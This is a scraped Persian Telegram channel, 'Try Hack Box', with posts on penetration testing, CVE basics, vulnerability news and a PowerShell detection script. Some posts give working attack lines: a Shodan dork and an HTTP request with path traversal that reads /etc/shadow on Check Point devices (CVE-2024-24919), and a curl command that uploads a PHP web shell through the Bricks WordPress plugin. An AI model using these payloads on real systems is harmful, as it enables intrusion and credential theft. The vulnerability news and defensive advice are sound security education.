Try Hack Box
4.86K subscribers
572 photos
63 videos
79 files
602 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @Unique_exploitBot
ADS (Tablighat ) :
@THBADS
Download Telegram
Try Hack Box
Common Vulnerabilities and Exposures (CVE) چیست؟ T.me/TryHackBox
Common Vulnerabilities and Exposures (CVE) چیست؟


آسیب‌پذیری‌ها و مواجهه‌های رایج (CVE) فهرستی از نقص‌های امنیتی رایانه است که بر اساس اقدامات حیاتی برای کمک به افراد و شرکت‌ها در ارزیابی خطر ناشی از آسیب‌پذیری یا قرار گرفتن در معرض خودتان رتبه‌بندی می‌شوند. وقتی شخصی به یک CVE مراجعه می‌کند، می‌توانید به راحتی آسیب‌پذیری را با جستجو پیدا کنید، و به‌دلیل بررسی ساختاریافته و مستمر و مستندسازی آسیب‌پذیری یا قرار گرفتن در معرض به شیوه‌ای ثابت، می‌توانید به راحتی از اهمیت خطر برای سازمان خود مطمئن شوید. هشدارهای امنیتی صادر شده توسط فروشندگان یا محققان تقریباً همیشه حداقل یک شناسه CVE را ذکر می کنند.

ورودی‌های CVE مختصر هستند، شامل داده‌های فنی، یا اطلاعاتی درباره تأثیرات احتمالی یا خود اصلاح‌ها نمی‌شوند. این جزئیات در سایر پایگاه‌های داده، از جمله پایگاه داده آسیب‌پذیری ملی ایالات متحده (NVD)، پایگاه یادداشت‌های آسیب‌پذیری CERT/CC، و فهرست‌های اضافی که توسط فروشنده مورد نظر یا سایر سازمان‌های امنیت سایبری کنترل می‌شوند، ظاهر می‌شوند. در سراسر این سیستم‌های مختلف، شناسه‌های CVE راهی قابل اعتماد برای درک نقص‌های امنیتی منحصربه‌فرد به روشی قابل تکرار به کاربران می‌دهند.

یک استاندارد مرتبط برای رتبه‌بندی بحرانی بودن یک CVE در سیستم امتیازدهی آسیب‌پذیری مشترک (CVSS) یافت می‌شود، مجموعه‌ای از استانداردهای باز برای تخصیص یک عدد به یک آسیب‌پذیری برای ارزیابی شدت آن. امتیازات CVSS در مشاوره‌های CVE، NVD و CERT فهرست شده‌اند. امتیازها از 0.0 تا 10.0 متغیر است که اعداد بالاتر نشان دهنده درجه بالاتری از شدت آسیب پذیری هستند. بسیاری از فروشندگان امنیتی سیستم های امتیازدهی خود را نیز ایجاد کرده اند.

CVE توسط شرکت MITRE مدیریت می‌شود که توسط آژانس امنیت سایبری و امنیت زیرساخت (CISA)، بخشی از وزارت امنیت داخلی ایالات متحده تأمین مالی می‌شود.
#cve
@TryHackBox
CVE چیست ؟
مخفف "شناسه‌ی تهدید واحد" (Common Vulnerabilities and Exposures) است که یک شناسه‌ی یکتا برای هر آسیب پذیری در یک نرم‌افزار، سیستم عامل، دستگاه یا سرویس اینترنتی است. این شناسه‌ها برای شناسایی آسیب پذیری‌ها و مدیریت ریسک‌های امنیتی بسیار مفید هستند.

از سال 1999 توسط رابرت مارتین (Robert Martin) به همراه تیم امنیتی MITRE Corporation تاسیس شده است و با هدف دادن یک شناسه‌ی یکتا به هر آسیب پذیری، کمک به تبادل اطلاعات و تطابق بین بخش‌های مختلف صنعت امنیتی را فراهم کرده است.

هر CVE شامل یک شناسه‌ی یکتا، توضیحاتی در مورد آسیب پذیری، اثرات آن، راه حل‌های احتمالی و منابع مرتبط است. این شناسه‌ها به صورت عمومی در دسترس هستند و هرکسی می‌تواند از آن‌ها برای شناسایی و رفع آسیب پذیری‌های مشابه در سیستم‌های خود استفاده کند

چگونه cve خود را ثبت کنیم ؟

ثبت یک CVE (شناسه‌ی تهدید واحد)، مراحلی نیاز دارد که در ادامه توضیح داده شده است:

جمع آوری اطلاعات: اولین مرحله در ثبت یک CVE، جمع آوری اطلاعات مربوط به آسیب پذیری است. این اطلاعات شامل نوع و نسخه سیستم عامل، نوع و نسخه نرم‌افزار، قابلیت‌های مورد تاثیر و … می‌شود.

ایجاد گزارش: پس از جمع آوری اطلاعات، باید یک گزارش ایجاد کرد. این گزارش شامل توضیحات دقیق در مورد آسیب پذیری، روش‌های تست آن، نتایج حاصل، و… می‌شود.

تأیید گزارش: پس از ایجاد گزارش، باید مطمئن شوید که آن آسیب پذیری، واقعی و قابل تأیید است.

ارسال گزارش: برای ثبت یک CVE باید به سایت CVE Mitre رفته و فرم مربوط به ثبت CVE را پر کرد. در این فرم، باید اطلاعات جمع آوری شده و همچنین گزارش ایجاد شده را بارگذاری کنید.

منتظر ماندن: پس از ارسال گزارش، باید منتظر تأیید و پذیرش CVE باشید. این فرآیند ممکن است چند هفته طول بکشد.

دریافت CVE: در صورت پذیرش CVE، شما یک شناسه‌ی یکتا برای آن آسیب پذیری دریافت می‌کنید. سپس می‌توانید این شناسه را در گزارش خود و یا در سایر مستندات مربوط به آن آسیب پذیری استفاده کنید.

توجه داشته باشید که CVE تکراری نباشد .
#CVE
@TryHackBox
👍5🔥1
👩‍💻 آسیب پذیری: VMware vRealize Network Insight - RCE with Pre-Authentication (CVE-2023-20887)

این پست به بررسی بهره برداری از CVE-2023-20887 در VMware Aria Operations for Networks (که قبلاً vRealize Network Insight نامیده می شد) می پردازد.

این آسیب‌پذیری شامل زنجیره‌ای از دو مسئله اجرای کد از راه دور (RCE) است که می‌تواند توسط مهاجمان احراز هویت نشده مورد سوء استفاده قرار گیرد.

لینک به Exploit
پیوند به مطالعه CVE

#VMware #RCE #CVE
@TryHackBox
@TryHackBoxOfficial
CVE-2024-2448

RCE
در متعادل کننده LoadMaster ، که به طور گسترده توسط Amazon ، Disney ، ASOS و سایر شرکت ها استفاده می شود.

تحقیق : https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/
#CVE
@TryHackBox
همه در مورد CVE-2024-24919 می نویسند و ما در مورد آن خواهیم نوشت.

🔍 Dork for Shodan: title:"Check Point" ssl:"target"

عملیات👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#CVE
@TryHackBox
🔖 regreSSHion
آسیب‌پذیری RCE پیش تأیید از راه دور در سرور OpenSSH

اگر آسیب پذیری حیاتی در یک سرویس محبوب نباشد، چه چیز دیگری می تواند یک روز عادی در جامعه امنیت اطلاعات را وارونه کند؟

این آسیب پذیری به عنوان CVE-2024-6387 شناسایی شده است و OpenSSH را تحت تأثیر قرار می دهد (از نسخه >= 8.5 و < 4.4). این به شما امکان می دهد تا از راه دور کد را به عنوان root در سیستم های لینوکس مبتنی بر glibc اجرا کنید.

👈 بخوانید

#research #CVE
@TryHackBox
👍62
Try Hack Box
Photo
در بولتن امنیتی دسامبر مایکروسافت، یک باگ به نام CVE-2024-49112 وجود دارد که سر و صدای زیادی به پا کرد و فکر می‌شد که با یک پچ برطرف شود. اما اینطور نشد... در برخی گروه‌ها، Proof of Concept (PoC) این باگ به قیمت ۱۵۷ دلار فروخته می‌شود.

این آسیب‌پذیری در پروتکل Lightweight Directory Access Protocol) LDAP) در سیستم‌های Microsoft Windows وجود دارد و به مهاجمان غیرمجاز اجازه می‌دهد تا از طریق درخواست‌های LDAP دستکاری‌شده، کدهای مخرب را به صورت ریموت اجرا کنند. این موضوع می‌تواند منجر به تسلط کامل بر سیستم و نشت داده‌ها شود.

💡 چرا این موضوع مهم است:
☠️ دسترسی غیرقابل کنترل به سیستم‌های آسیب‌پذیر.
☠️ احتمال نشت داده‌ها و اختلال در سرویس‌ها.
☠️ خطر آلوده‌شدن گسترده شبکه.

🛡️ اقدامات پیشنهادی:
بررسی کنید که اتصالات RPC ورودی فقط از شبکه‌های داخلی قابل اعتماد مجاز باشند.
مطمئن شوید که کنترلرهای دامنه دسترسی مستقیم به اینترنت ندارند (فقط DNS اگر روی کنترلر باشد).
سیستم‌ خود را از نظر پیکربندی‌های آسیب‌پذیر با استفاده از اسکریپت‌ها یا ابزارهای تخصصی بررسی کنید.
آخرین پچ های امنیتی مایکروسافت را نصب کنید.
ترافیک LDAP و RPC را برای شناسایی فعالیت‌های مشکوک زیر نظر بگیرید.

اسکریپت برای بررسی دسترسی RPC و اتصال به اینترنت (برای بررسی توسط ادمین‌ها روی کنترلرها):

# Detection script for CVE-2024-49112
Write-Output "Checking system configuration for CVE-2024-49112..."

# بررسی اینکه آیا سیستم یک کنترلر دامنه است یا نه
$isDomainController = (Get-WmiObject Win32_ComputerSystem).DomainRole -eq 4 -or (Get-WmiObject Win32_ComputerSystem).DomainRole -eq 5
if (-not $isDomainController) {
    Write-Output "This system is not a Domain Controller. No action needed."
    exit
}

# بررسی اینکه آیا اتصالات RPC ورودی از شبکه‌های غیرقابل اعتماد مسدود شده‌اند یا نه
$rpcsrvstatus = Get-NetFirewallRule -DisplayName "*RPC*" | Where-Object {$_.Direction -eq "Inbound" -and $_.Enabled -eq "True"}
if ($rpcsrvstatus) {
    Write-Output "Warning: Inbound RPC connections from untrusted networks are allowed. This configuration is vulnerable."
} else {
    Write-Output "Inbound RPC connections from untrusted networks are blocked."
}

# بررسی اینکه آیا کنترلر دامنه دسترسی به اینترنت دارد یا نه
$internetAccess = Test-Connection -ComputerName "1.1.1.1" -Count 2 -Quiet
if ($internetAccess) {
    Write-Output "Warning: Domain Controller has internet access. This configuration is vulnerable."
} else {
    Write-Output "Domain Controller does not have internet access."
}

Write-Output "Detection complete."

#CVE
@TryHackBox
👍9🐳2🔥1
🧩 ما به اشتراک‌گذاری آسیب‌پذیری‌های پرطرفدار و تهدیدات مرتبط با آن‌ها ادامه می‌دهیم:

۱. گوگل جزئیات فنی درباره آسیب‌پذیری EntrySign (CVE-2024-56161) در سیستم بررسی امضای میکروکد AMD Zen را منتشر کرد. این آسیب‌پذیری به مهاجمان اجازه می‌دهد تا Firmware (نرم‌افزار داخلی) مخرب را نصب کنند.

گوگل همچنین ابزاری به نام Zentool را منتشر کرده است که برای جیلبریک (دسترسی غیرمجاز) پردازنده‌های AMD استفاده می‌شود.

۲. محققان Assetnote یک آسیب‌پذیری در سیستم مدیریت محتوای Sitecore کشف کردند که می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution) شود. این آسیب‌پذیری با شناسه CVE-2025-27218 ثبت شده است.

۳. توسعه‌دهندگان Jenkins یک به‌روزرسانی امنیتی منتشر کردند که چهار آسیب‌پذیری در هسته این پلتفرم را برطرف می‌کند.

۴. شرکت Elastic یک به‌روزرسانی امنیتی برای Kibana منتشر کرد. این به‌روزرسانی یک آسیب‌پذیری را برطرف می‌کند که می‌تواند منجر به اجرای کد دلخواه از طریق آپلود فایل‌های مخرب یا درخواست‌های HTTP دستکاری‌شده شود.

۵. یک گروه از محققان جزئیات یک نوع جدید از حمله الکترونیکی به اینورترهای (مبدل‌های) نصب‌شده در نیروگاه‌های خورشیدی را ارائه کردند.

این حمله که ReThink نام دارد، می‌تواند به اینورترها آسیب فیزیکی وارد کند و عملکرد سیستم‌های خورشیدی را مختل کند.

۶. محققان SEC Consult جزئیات یک آسیب‌پذیری به نام "زیبای خفته" را فاش کردند که می‌تواند حسگر CrowdStrike Falcon را غیرفعال کند.

SEC Consult
این مشکل را در پایان سال ۲۰۲۳ به تامین‌کننده گزارش داد، اما تامین‌کننده بدون رفع مشکل، آن را به عنوان یک "خلاء در تشخیص" عنوان کرد.
با این حال، این آسیب‌پذیری در سال ۲۰۲۵ برطرف شد و علیرغم سکوت تامین‌کننده، SEC Consult جزئیات آن را به صورت عمومی منتشر کرد.

۷. محققان SquareX یک افزونه پلی‌مورفیک (چندشکلی) برای کروم توسعه داده‌اند که می‌تواند هر افزونه نصب‌شده محلی را تقلید کند.
این افزونه‌ها یک کپی دقیق از آیکون، پنجره‌های پاپ‌آپ HTML و پروسس های افزونه اصلی ایجاد می‌کنند و حتی ممکن است افزونه اصلی را موقتاً غیرفعال کنند. این کار باعث می‌شود قربانیان باور کنند که در حال وارد کردن اطلاعات ورود به یک افزونه واقعی هستند.
#CVE
@TryHackBox
1👍1
#CVE-2025-29927

در فریم‌ورک Next.js React یک آسیب‌پذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص می‌تواند برای دور زدن بررسی‌های احراز هویت مورد سوءاستفاده قرار گیرد.

این آسیب‌پذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.

Next.js از هدر داخلی
x-middleware-subrequest
برای جلوگیری از ایجاد حلقه‌های بی‌نهایت در درخواست‌های بازگشتی استفاده می‌کند.
با این حال، رد شدن اجرای Middleware باعث می‌شود درخواست‌ها بتوانند بررسی‌های حیاتی، از جمله اعتبارسنجی کوکی‌های احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.

این مشکل در نسخه‌های ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه می‌شود از پردازش درخواست‌های کاربران خارجی که حاوی هدر x-middleware-subrequest هستند، جلوگیری شود.

راشد علام (با نام‌های مستعار zhero و cold-try )، محققی که این آسیب‌پذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه می‌شود هرچه سریع‌تر پچ های امنیتی اعمال شوند.

به گفته JFrog، این باگ به مهاجمان اجازه می‌دهد به راحتی بررسی‌های احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وب‌سایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.

همچنین هشدار داده شده که هر وب‌سایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسی‌های اضافی استفاده می‌کند، در معرض این آسیب‌پذیری (CVE-2025-29927) قرار دارد و مهاجمان می‌توانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
👍1
آسیب‌پذیری CVE-2024-25600 در پلاگین Bricks وردپرس

معرفی آسیب‌پذیری:
این یک آسیب‌پذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخه‌های 1.9.6 و قبلتر) است.

جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترل‌نشده در admin-ajax.php
- امکان آپلود فایل‌های PHP مخرب
- دسترسی کامل به سرور (web shell)

- کد آسیب‌پذیر:

  // در فایل اصلی پلاگین
add_action('wp_ajax_bricks_upload', 'handle_file_upload');
// عدم وجود بررسی‌های امنیتی کافی

نمونه اکسپلویت:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" \
-F "action=bricks_upload" \
-F "file=@exploit.php"

تأثیرات:
- نصب وب‌شل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستم‌ها

راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان به‌روزرسانی

2. پیشگیرانه:
- محدود کردن دسترسی به admin-ajax.php
- پیاده‌سازی WAF با قوانین مخصوص

تشخیص سوءاستفاده:
- بررسی لاگ‌ها برای درخواست‌های غیرعادی به admin-ajax.php
- جستجوی فایل‌های PHP جدید در دایرکتوری uploads

نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .

https://github.com/Chocapikk/CVE-2024-25600

#Cve
@TryHackBox
👍1
سیسکو تأیید می‌کند که برخی از محصولات آن تحت تأثیر آسیب‌پذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفته‌اند.

این آسیب‌پذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی می‌شود و به عنوان مشکلی در پردازش پیام‌های پروتکل SSH شرح داده می‌شود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستم‌های آسیب‌پذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.

محققان هشدار دادند که بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به تسلط کامل میزبان‌ها شود که به افراد ثالث اجازه می‌دهد به داده‌های حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.

CVE-2025-32433
در نسخه‌های OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخه‌های قبلی تحت تأثیر قرار دارند.

چندی پس از اینکه وجود این آسیب‌پذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهره‌برداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپت‌های PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.

محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاه‌ها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاه‌های Cisco و Ericsson از Erlang استفاده می‌کنند.

هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده می‌کند، مانند آنچه در دستگاه‌های OT/IoT و دستگاه‌های محاسبات لبه استفاده می‌شود، در معرض خطر هک قرار دارد.


Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کرده‌اند، این نرم‌افزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده می‌شود.


با این حال، برای این شرکت‌ها معمولاً نصب جداگانه‌ای از Erlang/OTP مورد نیاز است.

در همین حال، Cisco ادامه می‌دهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گستره‌ای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامه‌های شبکه را بررسی کند.

در حال حاضر، شرکت به طور قطعی تأیید می‌کند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفته‌اند.

غول شبکه‌ای اشاره کرد که اگرچه ConfD و NSO (که انتظار می‌رود در ماه مه اصلاح شوند) تحت تأثیر آسیب‌پذیری قرار دارند، به دلیل پیکربندی خود، آسیب‌پذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
👍1
Try Hack Box
برای توضیح نحوه بهره‌برداری از آسیب‌پذیری CVE-2025-32433 در Erlang/OTP و پیاده‌سازی حمله، باید ابتدا به جزئیات فنی آسیب‌پذیری و مکانیزم آن توجه کرد. این آسیب‌پذیری مربوط به پردازش نادرست پیام‌های پروتکل SSH است که می‌تواند منجر به اجرای کد از راه دور (RCE)…
نتیجه‌گیری
آسیب‌پذیری CVE-2025-32433 به دلیل سادگی بهره‌برداری و تأثیرات بالقوه‌اش، تهدیدی جدی برای سیستم‌هایی است که از Erlang/OTP استفاده می‌کنند. مهاجمان می‌توانند از این آسیب‌پذیری برای دسترسی کامل به سیستم‌ها و انجام حملات مختلف استفاده کنند. بنابراین، به‌روزرسانی نرم‌افزارها و اجرای تدابیر امنیتی ضروری است.

⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شده‌اند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
👍2
🪲 چگونه از آخرین CVE های موجود مطلع بمانیم؟

curl cvedb.shodan.io/cves | jq | grep "cve_id"

#CVE #tips
@TryHackBox
👍11
CVE-2025-27920:
آسیب‌پذیری روز صفر، نفوذ کامل.

گروه APT به نام Marbled Dust با سوءاستفاده از یک آسیب‌پذیری روز صفر در پیام‌رسان شرکتی، حمله‌ای جاسوسی علیه کاربران Output Messenger انجام داد.

— اهداف انتخاب شده، سازه‌های مرتبط با ارتش کرد در عراق بودند.

این حمله و خود آسیب‌پذیری، با شناسه CVE-2025-27920 ، توسط تحلیلگران اطلاعات تهدید مایکروسافت کشف شد .

این مشکل، مدیر سرور پیام‌رسان خروجی (Output Messenger Server Manager) را تحت تأثیر قرار می‌دهد و یک آسیب‌پذیری پیمایش دایرکتوری (Directory Traversal) است که به مهاجمان احراز هویت‌شده اجازه می‌دهد تا به فایل‌های خارج از دایرکتوری مجاز، از جمله پیکربندی‌ها، داده‌های کاربر و حتی کد منبع، دسترسی پیدا کنند.

#News #MarbledDust #Microsoft #ART #Vulnerability #CVE #Spy
@TryHackBox
👍3
🥷 دور زدن احراز هویت Ruby-SAML / GitLab (CVE-2024-45409)

چرا باید CVE های مختلف را مطالعه کنیم؟ حداقل برای گسترش افق دید شما در صنعت پیچیده ما و درک پیش‌نیازهای باگ‌ها. امروز، برای شما، یک آسیب‌پذیری حیاتی دیگر در GitLab را بررسی می‌کنیم که به شما امکان می‌دهد مکانیسم‌های احراز هویت SAML را دور بزنید و با استفاده از یک نقص در پردازش پاسخ SAML، به دسترسی غیرمجاز دست یابید.

🔶️ بخوانید

#CVE #writeup
@TryHackBox
3👍2
Forwarded from TryHackBox Story
🚨 حمله گسترده به آسیب‌پذیری خطرناک در Microsoft SharePoint (CVE-2025-53770)

🔓 یک آسیب‌پذیری روز صفر وصله‌نشده در SharePoint توسط مهاجمان به‌صورت گسترده مورد سوءاستفاده قرار گرفته است.
🏢 بیش از ۷۵ سازمان، از جمله شرکت‌ها و نهادهای دولتی، تاکنون قربانی شده‌اند.
⚠️ مهاجمان از این باگ برای دسترسی از راه دور و نفوذ عمیق به سرورهای آسیب‌پذیر استفاده می‌کنند.

🛑 اگر از SharePoint استفاده می‌کنید:
🔍 فوراً بررسی امنیتی انجام دهید
🔒 دسترسی‌ها را محدود کنید
🚫 سرویس‌های حیاتی را موقتاً ایزوله کنید

📎 جزئیات فنی و لیست حملات:
🔗 کامل خبر
✍️نویسنده
@TryHackBoxStory | The Chaos

#News #ZeroDay #Microsoft #CVE #SharePoint
1